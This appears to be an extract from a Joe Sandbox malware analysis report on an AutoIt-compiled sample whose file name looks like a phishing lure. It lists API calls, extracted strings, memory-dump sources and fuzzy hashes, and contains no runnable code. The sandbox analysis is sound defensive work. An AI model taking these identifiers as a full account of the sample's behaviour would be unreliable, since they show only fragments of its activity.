                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                                                • Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
                                                                                • Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                                                • Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                                                                • Instruction ID: d3e05baf70842595a15b67714876080b4d37379fdc1224c105ba09137936e944
                                                                                • Opcode Fuzzy Hash: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                                                                • Instruction Fuzzy Hash: 44223730904506CBDF288A68C4A47BEB7A1BF41345F28816FDD468B693DB7C9CD6C74A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                • Instruction ID: 35e5cfd0643d00128ec34ecd890c43f992cb4d917009b55117061340238bc551
                                                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                • Instruction Fuzzy Hash: 18C1D83230507349DF2D4639953403FFAA15EA27B139A076FD8B3CB2D4EE18D965D624
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                • Instruction ID: 4494295b5c4546222a84ad3f443fcd2c01bced2acdb834a923f1c328fe2fc13d
                                                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                • Instruction Fuzzy Hash: CAC1D4333090B34ADF2D4639953403FBAA15EA27B139B036FD4B2DB2D4EE18D925D624
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                                                • Instruction ID: 37ec46b48614913021248eff56da5b361e939c746b2c312ceacc90cb3b6ed53b
                                                                                • Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                                                • Instruction Fuzzy Hash: C6311632905F845ECF338E28B814AB57F64BB62774FDDC16AE44C8B19AD221DC44F661
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 0047785B
                                                                                • DeleteObject.GDI32(00000000), ref: 0047786D
                                                                                • DestroyWindow.USER32 ref: 0047787B
                                                                                • GetDesktopWindow.USER32 ref: 00477895
                                                                                • GetWindowRect.USER32(00000000), ref: 0047789C
                                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 004779DD
                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004779ED
                                                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477A35
                                                                                • GetClientRect.USER32(00000000,?), ref: 00477A41
                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00477A7B
                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477A9D
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AB0
                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477ABB
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00477AC4
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AD3
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00477ADC
                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AE3
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00477AEE
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477B00
                                                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00492CAC,00000000), ref: 00477B16
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00477B26
                                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00477B4C
                                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00477B6B
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477B8D
                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477D7A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                • API String ID: 2211948467-2373415609
                                                                                • Opcode ID: cbe7ba0df42561e6311dda8264485de7e40118ff6f13b361737e76822355802e
                                                                                • Instruction ID: 98d8c47751f1291c48596143d1a8e41d269c6aae9b6b01708d63eada7aa7ec2c
                                                                                • Opcode Fuzzy Hash: cbe7ba0df42561e6311dda8264485de7e40118ff6f13b361737e76822355802e
                                                                                • Instruction Fuzzy Hash: DE027A71900105EFDB14DFA4DC89EAE7BB9FF49310F10856AF905AB2A1C738AD41CB68
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
                                                                                • IsWindowVisible.USER32(?), ref: 0048364B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpperVisibleWindow
                                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                • API String ID: 4105515805-45149045
                                                                                • Opcode ID: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
                                                                                • Instruction ID: 9f5fdaa8788cae778637d634d7abea83d78ef325d3b9343814b8d9d38e530adb
                                                                                • Opcode Fuzzy Hash: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
                                                                                • Instruction Fuzzy Hash: 28D19E702042009BCA04FF11C451A6E77E5AF55759F54886EF8826B3A3DB3DEE0ACB5A
                                                                                APIs
                                                                                • SetTextColor.GDI32(?,00000000), ref: 0048A630
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0048A661
                                                                                • GetSysColor.USER32(0000000F), ref: 0048A66D
                                                                                • SetBkColor.GDI32(?,000000FF), ref: 0048A687
                                                                                • SelectObject.GDI32(?,00000000), ref: 0048A696
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
                                                                                • GetSysColor.USER32(00000010), ref: 0048A6C9
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
                                                                                • FrameRect.USER32(?,?,00000000), ref: 0048A6DF
                                                                                • DeleteObject.GDI32(00000000), ref: 0048A6E6
                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
                                                                                • FillRect.USER32(?,?,00000000), ref: 0048A763
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
                                                                                  • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
                                                                                  • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
                                                                                  • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                                                  • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
                                                                                  • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
                                                                                  • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                                                  • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
                                                                                  • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                                                  • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
                                                                                  • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                                                  • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                                                  • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                                                  • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 3521893082-0
                                                                                • Opcode ID: a30ab07c5252c5b4c83c7dcf6a3672c108a1506ca5028a9a527dda2282f946dc
                                                                                • Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
                                                                                • Opcode Fuzzy Hash: a30ab07c5252c5b4c83c7dcf6a3672c108a1506ca5028a9a527dda2282f946dc
                                                                                • Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                                                                                • DeleteObject.GDI32(00000000), ref: 00402CE8
                                                                                • DeleteObject.GDI32(00000000), ref: 00402CF3
                                                                                • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                                                                                • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D
                                                                                  • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                                                • SendMessageW.USER32(?,00001053), ref: 0043C8DA
                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                • String ID: 0
                                                                                • API String ID: 464785882-4108050209
                                                                                • Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                                                • Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
                                                                                • Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                                                • Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99
                                                                                APIs
                                                                                • DestroyWindow.USER32(00000000), ref: 004774DE
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
                                                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
                                                                                • GetClientRect.USER32(00000000,?), ref: 0047763F
                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
                                                                                • GetStockObject.GDI32(00000011), ref: 004776A2
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004776A6
                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
                                                                                • DeleteDC.GDI32(00000000), ref: 004776C8
                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                                                                                • GetStockObject.GDI32(00000011), ref: 004777A6
                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                • API String ID: 2910397461-517079104
                                                                                • Opcode ID: 06145267f47237950f9bf2b394788d14c0e7c77fc12a147c01bfcfc54d464a41
                                                                                • Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
                                                                                • Opcode Fuzzy Hash: 06145267f47237950f9bf2b394788d14c0e7c77fc12a147c01bfcfc54d464a41
                                                                                • Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
                                                                                • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                                                                                • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DriveType
                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                • API String ID: 2907320926-4222207086
                                                                                • Opcode ID: 525cd716a75f6dddbaca68c36b6172640c1f360a49a56ba8d63905ac25315571
                                                                                • Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
                                                                                • Opcode Fuzzy Hash: 525cd716a75f6dddbaca68c36b6172640c1f360a49a56ba8d63905ac25315571
                                                                                • Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: __wcsnicmp
                                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                • API String ID: 1038674560-86951937
                                                                                • Opcode ID: 01f500350c9121920feb7755ee40dd21149ff6c4001fb330d259501f12758d04
